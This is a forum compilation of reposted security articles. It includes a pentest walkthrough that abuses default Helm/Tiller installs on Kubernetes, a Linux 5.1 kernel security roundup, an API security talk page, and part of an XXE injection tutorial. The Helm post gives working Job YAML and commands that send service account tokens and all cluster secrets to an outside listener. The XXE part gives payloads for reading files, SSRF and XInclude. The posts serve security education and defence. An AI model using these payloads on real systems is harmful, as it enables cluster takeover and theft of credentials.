Posts posted by Nytro

  1. Attacking default installs of Helm on Kubernetes

    28 JANUARY 2019, tagged: pentest, kubernetes, helm, tiller, gke

    Intro

    I have totally fallen down the Kubernetes rabbit hole and am really enjoying playing with it and attacking it. One thing I've noticed is although there are a lot of great resources to get up and running with it really quickly, there are far fewer that take the time to make sure it's set up securely. And a lot of these tutorials and quick-start guides leave out important security options for the sake of simplicity.

    In my opinion, one of the biggest offenders of this is Helm, the "package manager for Kubernetes". There are countless tutorials and Stack Overflow answers that completely gloss over the security recommendations and take steps that really put the entire cluster at risk. More and more organizations I've talked to recently actually seem to be ditching the cluster side install of Helm ("Tiller") entirely for security reasons, and I wanted to explore and explain why.

    In this post, I'll set up a default GKE cluster with Helm and Tiller, then walk through how an attacker who compromises a running pod could abuse the lack of security controls to completely take over the cluster and become full admin.

    tl;dr

    The "simple" way to install Helm requires cluster-admin privileges to be given to its pod, and then exposes a gRPC interface inside the cluster without any authentication. This endpoint allows any compromised pod to deploy arbitrary Kubernetes resources and escalate to full admin. I wrote a few Helm charts that can take advantage of this here: https://github.com/ropnop/pentest_charts

    Disclaimer

    This post is only meant to practically demonstrate the risks involved in not enabling the security features for Helm. These are not vulnerabilities in Helm or Tiller and I'm not disclosing anything previously unknown. My only hope is that by laying out practical attacks, people will think twice about configuring loose RBAC policies and not enabling mTLS for Tiller.

    Installing the Environment

    To demonstrate the attack, I'm going to set up a typical web stack on Kubernetes using Google Kubernetes Engine (GKE) and Helm. I'll be installing everything using just the defaults as found in many write-ups on the internet. If you want to just get to the attacking part, feel free to skip this section and go directly to "Exploiting a Running Pod".

    Set up GKE

    I've created a new GCP project and will be using the command line tool to spin up a new GKE cluster and gain access to it:

    $ gcloud projects create ropnop-helm-testing #create a new project
    $ gcloud config set project ropnop-helm-testing #use the new project
    $ gcloud config set compute/region us-central1
    $ gcloud config set compute/zone us-central1-c
    $ gcloud services enable container.googleapis.com #enable Kubernetes APIs
    

    Now I'm ready to create the cluster and get credentials for it. I will do it with all the default options. There are a lot of command line switches that can help lock down this cluster, but I'm not going to provide any:

    $ gcloud container clusters create ropnop-k8s-cluster
    

    After a few minutes, my cluster is up and running:

    [screenshot: gcloud clusters list showing the running cluster]

    Lastly, I get credentials and verify connectivity with kubectl:

    $ gcloud container clusters get-credentials ropnop-k8s-cluster #set up kubeconfig
    $ kubectl config get-clusters
    

    [screenshot: kubectl cluster info]

    And everything looks good. Time to install Helm and Tiller.

    Installing Helm+Tiller

    Helm has a quickstart guide for getting up and running quickly. This guide does mention that the default installation is not secure and should only be used for non-production or internal clusters. However, several other guides on the internet skip over this fact (example 1, example 2). And several Stack Overflow answers I've seen just have copy/paste code to install Tiller with no mention of security.

    Again, I'll be doing a default installation of Helm and Tiller, using the "easiest" method.

    Creating the service account

    Since Role Based Access Control (RBAC) is now enabled by default on every Kubernetes provider, the original way of using Helm and Tiller doesn't work. The Tiller pod needs elevated permissions to talk to the Kubernetes API. Fine-grained control of service account permissions is tricky and often overlooked, so the "easiest" way to get up and running is to create a service account for Tiller with full cluster admin privileges.

    To create a service account with cluster admin privs, I define a new ServiceAccount and ClusterRoleBinding in YAML:

    apiVersion: v1  
    kind: ServiceAccount  
    metadata:  
      name: tiller
      namespace: kube-system
    ---
    apiVersion: rbac.authorization.k8s.io/v1  
    kind: ClusterRoleBinding  
    metadata:  
      name: tiller
    roleRef:  
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: cluster-admin
    subjects:  
      - kind: ServiceAccount
        name: tiller
        namespace: kube-system
    

    and apply it with kubectl:

    $ kubectl apply -f tiller-rbac.yaml
    

    This created a service account called tiller, generated a secret auth token for it, and gave the account full cluster admin privileges.

    Initialize Helm

    The final step is to initialize Helm with the new service account. Again, there are additional flags that can be provided to this command that will help lock it down, but I'm just going with the "defaults":

    $ helm init --service-account tiller
    

    Besides setting up our client, this command also creates a deployment and service in the kube-system namespace for Tiller. The resources are tagged with the label app=helm, so you can filter and see everything running:

    [screenshot: resources filtered by the app=helm label]

    We can also see that the Tiller deployment is configured to use our cluster admin service account:

    $ kubectl -n kube-system get deployments -l 'app=helm' -o jsonpath='{.items[0].spec.template.spec.serviceAccount}'
    tiller  
    

    Installing Wordpress

    Now it's time to use Helm to install something. For this scenario, I'll be installing a Wordpress stack from the official Helm repository. This is a pretty good example of how quick and powerful Helm can be. In one command we can get a full stack deployment of Wordpress including a persistent MySQL backend.

    $ helm install stable/wordpress --name mycoolblog
    

    With no other flags, Tiller deploys all the resources into the default namespace. The "name" field gets applied as a release label on the resource, so we can view all the resources that were created:

    [screenshot: kubectl get all for the mycoolblog release]

    Helm took care of exposing the port for us too via a LoadBalancer service, so if we visit the external IP listed, we can see that Wordpress is indeed up and running:

    [screenshot: Wordpress running at the external IP]

    And that's it! I've got my blog up and running on Kubernetes in no time. What could go wrong now?

    Exploiting a Running Pod

    From here on out, I am going to assume that my Wordpress site has been totally compromised and an attacker has gained remote code execution on the underlying pod. This could be through a vulnerable plugin I installed or a bad misconfiguration, but let's just assume an attacker got a shell.

    Note: for purposes of this scenario I'm just giving myself a shell on the pod directly with the following command

    $ kubectl exec -it mycoolblog-wordpress-5d6c7d5464-hl972 -- /bin/bash
    

    Post Exploitation

    After landing a shell, there are a few indicators that quickly point to this being a container running on Kubernetes:

    • The file /.dockerenv exists - we're inside a Docker container
    • Various Kubernetes environment variables are set
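
    Those two checks can be scripted in a couple of lines; this is a minimal sketch that relies only on the standard /.dockerenv marker file and the KUBERNETES_* variables the kubelet injects by default:

    ```shell
    # quick container/Kubernetes fingerprinting from a shell on the pod
    [ -f /.dockerenv ] && echo "docker: yes" || echo "docker: no"
    # the kubelet injects KUBERNETES_* service variables into containers by default
    env | grep '^KUBERNETES_' | head -5
    ```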

    [screenshot: Kubernetes environment variables in the pod]

    There are several good resources out there for various Kubernetes post-exploitation activities. I recommend carnal0wnage's Kubernetes master post for a great round-up. Trying some of these techniques, though, we'll discover that the default GKE install is still fairly locked down (and updated against recent CVEs). Even though we can talk to the Kubernetes API, for example, RBAC is enabled and we can't get anything from it:

    [screenshot: RBAC denying the pod listing request]

    Time for some more reconnaissance.

    Service Reconnaissance

    By default, Kubernetes makes service discovery within a cluster easy through kube-dns. Looking at /etc/resolv.conf we can see that this pod is configured to use kube-dns:

    nameserver 10.7.240.10  
    search default.svc.cluster.local svc.cluster.local cluster.local us-central1-c.c.ropnop-helm-testing.internal c.ropnop-helm-testing.internal google.internal  
    options ndots:5  
    

    Our search domains tell us we're in the default namespace (as well as inside a GKE project named ropnop-helm-testing).

    DNS names in kube-dns follow the format: <svc_name>.<namespace>.svc.cluster.local. Through DNS, for example, we can look up our MariaDB service that Helm created:

    $ getent hosts mycoolblog-mariadb
    10.7.242.104    mycoolblog-mariadb.default.svc.cluster.local  
    

    (Note: I'm using getent since this pod didn't have standard DNS tools installed - living off the land ftw :) )

    Even though we're in the default namespace, it's important to remember that namespaces don't provide any security. By default, there are no network policies that prevent cross-namespace communication. From this position, we can query services that are running in the kube-system namespace. For example, the kube-dns service itself:

    $ getent hosts kube-dns.kube-system.svc.cluster.local
    10.7.240.10     kube-dns.kube-system.svc.cluster.local  
    

    Through DNS, it's possible to enumerate running services in other namespaces. Remember how Tiller created a service in kube-system? Its default name is 'tiller-deploy'. If we checked for that via a DNS lookup we'd see it exists and exactly where it's at:

    [screenshot: DNS lookup finding the tiller-deploy service]
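
    That lookup can be reproduced with getent. Keep in mind tiller-deploy is only the default service name (an operator can change it at install time), so this is a guess, not a guarantee:

    ```shell
    # probe for Tiller's default service name via cluster DNS;
    # outside a cluster this simply reports "not found"
    if getent hosts tiller-deploy.kube-system.svc.cluster.local >/dev/null 2>&1; then
      echo "tiller-deploy found"
    else
      echo "tiller-deploy not found"
    fi
    ```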

    Great! Tiller is installed in this cluster. How can we abuse it?

    Abusing tiller-deploy

    Helm talks to a Kubernetes cluster over gRPC to the tiller-deploy pod. The pod then talks to the Kubernetes API with its service account token. When a helm command is run from a client, under the hood a port forward is opened into the cluster to talk directly to the tiller-deploy service, which always points to the tiller-deploy pod on TCP 44134.

    This means a user outside the cluster must be able to open port forwards into the cluster, since port 44134 is not externally exposed. From inside the cluster, however, 44134 is directly reachable and no port forward is needed.

    We can verify that the port is open by simply trying to curl it:

    [screenshot: curl to port 44134 showing it is open]

    Since we didn't get a timeout, something is listening there. Curl fails though, since this endpoint is designed to talk gRPC, not HTTP.
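
    If curl isn't available on the compromised pod, bash's built-in /dev/tcp pseudo-device gives a similar reachability check. This is a sketch; the hostname assumes the default service name:

    ```shell
    # TCP connect test to Tiller's gRPC port using only bash built-ins
    host=tiller-deploy.kube-system.svc.cluster.local
    if timeout 2 bash -c "exec 3<>/dev/tcp/$host/44134" 2>/dev/null; then
      echo "44134 open"
    else
      echo "44134 closed or unreachable"
    fi
    ```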

    Knowing we can reach the port, if we can send the right messages, we can talk directly to Tiller - since by default, Tiller does not require any authentication for gRPC communication. And since in this default install Tiller is running with cluster-admin privileges, we can essentially run cluster admin commands without any authentication.

    Talking gRPC to Tiller

    All of the gRPC endpoints are defined in the source code in Protobuf format, so anyone can create a client to communicate to the API. But the easiest way to communicate with Tiller is just through the normal Helm client, which is a static binary anyway.

    On our compromised pod, we can download the helm binary from the official releases. To download and extract to /tmp:

    export HVER=v2.11.0 #you may need different version  
    curl -L "https://storage.googleapis.com/kubernetes-helm/helm-${HVER}-linux-amd64.tar.gz" | tar xz --strip-components=1 -C /tmp linux-amd64/helm  
    

    Note: You may need to download a specific version to match the version running on the server. You'll see error messages telling you what version to get.

    The helm binary allows us to specify a direct address to Tiller with --host or with the HELM_HOST environment variable. By plugging in the discovered tiller-deploy service's FQDN, we can directly communicate with the Tiller pod and run arbitrary Helm commands. For example, we can see our previously installed Wordpress release!

    [screenshot: helm ls listing the Wordpress release]

    From here, we have full control of Tiller. We can do anything a cluster admin could normally do with Helm, including installing/upgrading/deleting releases. But we still can't "directly" talk to the Kubernetes API, so let's abuse Tiller to upgrade our privileges and become full cluster admin.

    Stealing secrets with Helm and Tiller

    Tiller is configured with a service account that has cluster admin privileges. This means that the pod is using a secret, privileged service token to authenticate with the Kubernetes API. Service accounts are generally only used for "non-human" interactions with the k8s API, however anyone in possession of the secret token can still use it. If an attacker compromises Tiller's service account token, he or she can execute any Kubernetes API call with full admin privileges.

    Unfortunately, the Helm API doesn't support direct querying of secrets or other resources. Using Helm, we can only create new releases from chart templates.

    Chart templates are very well documented and allow us to template out custom resources to deploy to Kubernetes. So we just need to craft a resource in a way to exfiltrate the secret(s) we want.

    Stealing a service account token

    When the service account name is known, stealing its token is fairly straightforward. All that is needed is to launch a pod with that service account, then read the value from /var/run/secrets/kubernetes.io/serviceaccount/token, where the token value gets mounted at creation. It's possible to just define a job to read the value and use curl to POST it to a listening URL:

    apiVersion: batch/v1  
    kind: Job  
    metadata:  
      name: tiller-deployer # something benign looking
      namespace: kube-system
    spec:  
      template:
        spec:
          serviceAccountName: tiller # hardcoded service account name
          containers:
            - name: tiller-deployer # something benign looking
              image: byrnedo/alpine-curl
              command: ["curl"]
              args: ["-d", "@/var/run/secrets/kubernetes.io/serviceaccount/token", "$(EXFIL_URL)"]
              env:
                - name: EXFIL_URL
                  value: "https://<listening_url>" # replace URL here
          restartPolicy: Never
      backoffLimit: 5
    

    Of course, since we don't have access to the Kubernetes API directly and are using Helm, we can't just send this YAML - we have to send a Chart.

    I've created a chart to run the above job:

    https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_sa_token

    This chart is also packaged up and served from a Chart Repo here: https://ropnop.github.io/pentest_charts/

    This Chart takes a few values:

    • name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
    • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
    • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack)
    • namespace - defaults to kube-system, but you can override it

    To deploy this chart and exfil the tiller service account token, we have to first "initialize" Helm in our pod:

    $ export HELM_HOME=/tmp/helmhome
    $ /tmp/helm init --client-only
    

    Once it initializes, we can deploy the chart directly and pass it the values via command line:

    $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
    $ /tmp/helm install --name tiller-deployer \
        --set serviceAccountName=tiller \
        --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" \
        --repo https://ropnop.github.io/pentest_charts exfil_sa_token
    

    Our Job was successfully deployed:

    [screenshot: the job successfully deployed via Helm]

    And I got the tiller service account token POSTed back to me in Slack :)

    [screenshot: the tiller token POSTed to Slack]

    After the job completes, it's easy to clean up everything and delete all the resources with Helm purge:

    $ /tmp/helm delete --purge tiller-deployer
    

    Stealing all secrets from Kubernetes

    While you can always use the "exfil_sa_token" chart to steal service account tokens, it's predicated on one thing: knowing the name of the service account.

    In the above case, an attacker would have to pretty much guess that the service account name was "tiller", or the attack wouldn't work. In this scenario, since we don't have access to the Kubernetes API to query service accounts, and we can't look it up through Tiller, there's no easy way to just pull out a service account token if it has a unique name.

    The other option, though, is to use Helm to create a new, highly privileged service account, and then use that to extract all the other Kubernetes secrets. To accomplish that, we create a new ServiceAccount and ClusterRoleBinding, then attach them to a new job that extracts all Kubernetes secrets via the API. The YAML definitions to do that would look something like this:

    ---
    apiVersion: v1  
    kind: ServiceAccount  
    metadata:  
      name: tiller-deployer #benign looking service account
      namespace: kube-system
    ---
    apiVersion: rbac.authorization.k8s.io/v1  
    kind: ClusterRoleBinding  
    metadata:  
      name: tiller-deployer
    roleRef:  
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: cluster-admin # full cluster-admin privileges
    subjects:  
      - kind: ServiceAccount
        name: tiller-deployer
        namespace: kube-system
    ---
    apiVersion: batch/v1  
    kind: Job  
    metadata:  
      name: tiller-deployer # something benign looking
      namespace: kube-system
    spec:  
      template:
        spec:
          serviceAccountName: tiller-deployer # newly created service account
          containers:
            - name: tiller-deployer # something benign looking
              image: rflathers/kubectl:bash # alpine+curl+kubectl+bash
              command:
                - "/bin/bash"
                - "-c"
                - "curl --data-binary @<(kubectl get secrets --all-namespaces -o json) $(EXFIL_URL)"
              env:
                - name: EXFIL_URL
                  value: "https://<listening_url>" # replace URL here
          restartPolicy: Never
    

    In the same vein as above, I packaged the above resources into a Helm chart:

    https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_secrets

    This Chart also takes the same values:

    • name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
    • serviceAccountName - the name of the cluster-admin service account to create and use (again, use something innocuous looking)
    • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack)
    • namespace - defaults to kube-system, but you can override it

    When this chart is installed, it will create a new cluster-admin service account, then launch a job using that service account to query for every secret in all namespaces, and dump that data in a POST body back to EXFIL_URL.

    Just like above, we can launch this from our compromised pod:

    $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
    $ export HELM_HOME=/tmp/helmhome
    $ /tmp/helm init --client-only
    $ /tmp/helm install --name tiller-deployer \
        --set serviceAccountName="tiller-deployer" \
        --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" \
        --repo https://ropnop.github.io/pentest_charts exfil_secrets
    

    After Helm installs the chart, we'll get every Kubernetes secret dumped back to our exfil URL (in my case posted in Slack)

    [screenshot: all cluster secrets dumped to Slack]

    And then make sure to clean up and remove the new service account and job:

    $ /tmp/helm delete --purge tiller-deployer
    

    With the secrets in JSON form, you can use jq to extract out plaintext passwords, tokens and certificates:

    cat all_secrets.json | jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'  
    
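
    jq's @base64d filter is doing the same decoding you could do by hand with the base64 tool, since Kubernetes stores secret values base64-encoded rather than encrypted. A tiny self-contained illustration with a made-up secret value:

    ```shell
    # Kubernetes secret values are base64-encoded, not encrypted
    encoded=$(printf 'supersecret' | base64)
    echo "encoded: $encoded"
    printf '%s' "$encoded" | base64 -d   # recovers the plaintext
    ```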

    And searching through that you can find the service account token tiller uses:

    [screenshot: the tiller service account token in the JSON dump]

    Using service account tokens

    Now armed with Tiller's service account token, we can finally directly talk to the Kubernetes API from within our compromised pod. The token value needs to be added as a header in the request: Authorization: Bearer <token_here>

    $ export TOKEN="eyJhb...etc..."
    $ curl -k -H "Authorization: Bearer $TOKEN" https://10.7.240.1:443/
    

    Working from within the cluster is annoying though, since it is always going to require us to execute commands from our compromised pod. Since this is a GKE cluster, we should be able to access the Kubernetes API over the internet if we find the correct endpoint.

    For GKE, you can pull data about the Kubernetes cluster (including the master endpoint) from the Google Cloud Metadata API from the compromised pod:

    $ curl -s -kH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | grep KUBERNETES_MASTER_NAME
    KUBERNETES_MASTER_NAME: 104.154.18.15  
    

    Armed with the IP address and Tiller's token, you can then configure kubectl from anywhere to talk to the GKE cluster on that endpoint:

    $ kubectl config set-cluster pwnedgke --server=https://104.154.18.15
    $ kubectl config set-credentials tiller --token=$TILLER_TOKEN
    $ kubectl config set-context pwnedgke --cluster pwnedgke --user tiller
    $ kubectl config use-context pwnedgke
    $ kubectl --insecure-skip-tls-verify cluster-info
    

    Note: I'm skipping TLS verify because I didn't configure the cluster certificate

    For example, let's take over the GKE cluster from Kali: 
    [screenshot: cluster-admin access to the GKE cluster from Kali]

    And that's it - we have full admin control over this GKE cluster :)

    There is a ton more we can do to maintain persistence (especially after dumping all the secrets previously), but that will remain a topic for future posts.

    Defenses

    This entire scenario was created to demonstrate how the "default" installation of Helm and Tiller (as well as GKE) can make it really easy for an attacker to escalate privileges and take over the entire cluster if a pod is compromised.

    If you are considering using Helm and Tiller in production, I strongly recommend following everything outlined here:

    https://github.com/helm/helm/blob/master/docs/securing_installation.md

    mTLS should be configured for Tiller, and RBAC should be as locked down as possible. Or don't create a Tiller service and require admins to do manual port forwards to the pod.

    Or ask yourself if you really need Tiller at all - I have seen more and more organizations simply abandon Tiller altogether and just use Helm client-side for templating.

    For GKE, Google has a good writeup as well on securing a cluster for production:

    https://cloud.google.com/solutions/prep-kubernetes-engine-for-prod

    Using VPCs, locking down access, filtering metadata, and enforcing network policies should be done at a minimum.

    Sadly, a lot of these security controls are hard to implement, and require a lot more effort and research to get right. It's not surprising to me then that a lot of default installations still make their way to production.

    Hope this helps someone! Let me know if you have any questions or want me to focus on anything more in the future. I'm hoping this is just the first of several Kubernetes related posts.

    -ropnop

     

    Source: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

  2. May 27, 2019

    security things in Linux v5.1

    Filed under: Blogging,Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 8:49 pm

    Previously: v5.0.

    Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

     

    introduction of pidfd


    Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)

     

    explicitly test for userspace mappings of heap memory


    During Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

     

    LSM stacking: shared security blobs


    Casey Schaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs” associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task is confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, AppArmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM, as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.

     

    SafeSetID LSM


    Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

     

    ongoing: refcount_t conversions


    Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.

    ongoing: implicit fall-through removal

    Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.
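
    To see what the warning catches, here is a minimal sketch (ordinary userspace C, not kernel code) that compiles a switch with a missing break under gcc's -Wimplicit-fallthrough:

    ```shell
    # demo: -Wimplicit-fallthrough flags a missing break (requires gcc >= 7)
    cat > /tmp/fallthrough.c <<'EOF'
    int f(int x) {
        int r = 0;
        switch (x) {
        case 1:
            r = 1;   /* missing break: silently falls into case 2 */
        case 2:
            r += 2;
            break;
        }
        return r;
    }
    EOF
    # emits "warning: this statement may fall through" for case 1
    gcc -c -Wimplicit-fallthrough /tmp/fallthrough.c -o /tmp/fallthrough.o
    ```

    In the kernel, intentional fall-throughs are annotated (historically with a "fall through" comment, later the fallthrough pseudo-keyword) so the warning only fires on the unintentional ones.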

     

    stack variable initialization includes scalars


    The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to see this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.

     

    That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already. :)

     

    © 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

     

    Source: https://outflux.net/blog/archives/2019/05/27/security-things-in-linux-v5-1/

  3. Common API security pitfalls

    This page contains the resources for the talk titled "Common API security pitfalls". A recording is available at the bottom.

    [slide deck: Common API security pitfalls]

    Abstract

    The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications has sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolute must-have, and which additional security measures do you need to take into account?

    These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

    About Philippe De Ryck

    Philippe De Ryck is the founder of Pragmatic Web Security, where he travels the world to train developers on web security and security engineering. He holds a Ph.D. in web security from KU Leuven. Google recognizes Philippe as a Google Developer Expert for his knowledge of web security and security in Angular applications.

     

    Sursa: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls

  4. XML external entity (XXE) injection

    In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

    What is XML external entity injection?

    XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.

    In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

    XXE injection

    How do XXE vulnerabilities arise?

    Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

    XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.

    What are the types of XXE attacks?

    There are various types of XXE attacks:

    Exploiting XXE to retrieve files

    To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:

    • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
    • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

    For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

    <?xml version="1.0" encoding="UTF-8"?>
    <stockCheck><productId>381</productId></stockCheck>

    The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <stockCheck><productId>&xxe;</productId></stockCheck>

    This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:

    Invalid product ID: root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...

    Note

    With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.
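This per-node testing is easy to script. The sketch below is my own Python illustration (not from the original article); it reuses the stock-check payload shown above and generates one variant per data node, each routing the &xxe; entity through a different value:

```python
import xml.etree.ElementTree as ET

DOCTYPE = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'

def payload_variants(xml_text):
    """Yield one XXE payload per data node, each using &xxe; in a different place."""
    original = ET.fromstring(xml_text)
    node_count = len([el for el in original.iter() if el.text and el.text.strip()])
    for i in range(node_count):
        root = ET.fromstring(xml_text)
        nodes = [el for el in root.iter() if el.text and el.text.strip()]
        nodes[i].text = "&xxe;"
        # ElementTree escapes the ampersand on serialization; undo it for this one entity
        body = ET.tostring(root, encoding="unicode").replace("&amp;xxe;", "&xxe;")
        yield DOCTYPE + body

sample = "<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>"
for payload in payload_variants(sample):
    print(payload)
```

Each printed payload would then be submitted in place of the original request body, while watching the response for the entity's expansion.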

    Exploiting XXE to perform SSRF attacks

    Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

    To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the backend system. If not, then you will only be able to perform blind SSRF attacks (which can still have critical consequences).

    In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:

    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

    Blind XXE vulnerabilities

    Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

    Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data. And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages.

    Finding hidden attack surface for XXE injection

    Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.

    XInclude attacks

    Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a backend SOAP request, which is then processed by the backend SOAP service.

    In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

    To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include parse="text" href="file:///etc/passwd"/></foo>

    XXE attacks via file upload

